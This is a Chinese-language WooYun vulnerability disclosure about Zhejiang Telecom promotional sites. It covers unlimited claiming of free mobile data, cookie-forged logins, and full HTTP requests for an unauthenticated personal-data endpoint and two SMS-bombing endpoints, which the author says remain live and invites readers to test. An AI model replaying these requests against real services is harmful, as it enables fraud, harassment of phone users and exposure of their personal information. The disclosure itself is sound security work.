当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045249

漏洞标题:浙江电信果粉部落网站逻辑漏洞无限刷省内流量

相关厂商:浙江电信

漏洞作者: 路人甲

提交时间:2013-12-16 16:35

修复时间:2014-01-30 16:36

公开时间:2014-01-30 16:36

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-16: 细节已通知厂商并且等待厂商处理中
2013-12-20: 厂商已经确认,细节仅向厂商公开
2013-12-30: 细节向核心白帽子及相关领域专家公开
2014-01-09: 细节向普通白帽子公开
2014-01-19: 细节向实习白帽子公开
2014-01-30: 细节向公众公开

简要描述:

浙江电信果粉部落网站逻辑漏洞,可以无限次刷流量。

详细说明:

浙江电信果粉部落网站逻辑漏洞 首次登陆可以送300M流量,但是因为逻辑漏洞,可以无限次刷流量。
可通过无限次调用 g.10006.co/lq 无限次刷流量。
此漏洞在12月5日前有效,目前可能已修复。
另外,浙江电信所有活动网站*.zj189.cn均存在通过修改COOKIE可以伪造用户身份登陆的问题。登陆后可以查看用户个人信息,办理流量包等业务;
P.S 这里还有一个完全不需要验证的读取用户真实姓名和套餐名的接口:
---------------------------

POST /errnav/getAData HTTP/1.1
Host: s.zj189.cn
Connection: keep-alive
Content-Length: 26
Cache-Control: max-age=0
Accept: */*
Origin: http://s.zj189.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://s.zj189.cn/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
t=rateb&UserID=<你的手机号>


---------------------------
P.P.S:
短信炸弹接口2枚:
---------------------------------

POST /ajax/getVerifyCode/<你的手机号> HTTP/1.1
Host: cp.zj189.cn
Connection: keep-alive
Content-Length: 0
Accept: */*
Origin: http://cp.zj189.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_2 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8H7 Safari/6533.18.5
Referer: http://cp.zj189.cn/userLogin
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4


---------------------------------

POST /sso/sso/sendsms HTTP/1.1
Host: login.zj189.cn
Connection: keep-alive
Content-Length: 18
Accept: */*
Origin: http://login.zj189.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://login.zj189.cn/sso/login.jsp?goto=http://s.zj189.cn/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
UserID=<你的手机号>


---------------------------------

漏洞证明:

刷流量的漏洞目前可能已经被修复,否则我也不会公开。
以下是刷成功的截图:

Screenshot_2013-12-02-10-52-37.png


Screenshot_2013-12-01-18-56-00.png


另外的几个漏洞目前均有效,大家可以测试。

修复方案:

检查后台逻辑。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-12-20 18:36

厂商回复:

CNVD确认并复现所述情况(17日测试时多个接口仍然存活),已经由CNCERT直接通报给中国电信集团公司,由其后续派发工单协调省公司处置。

最新状态:

暂无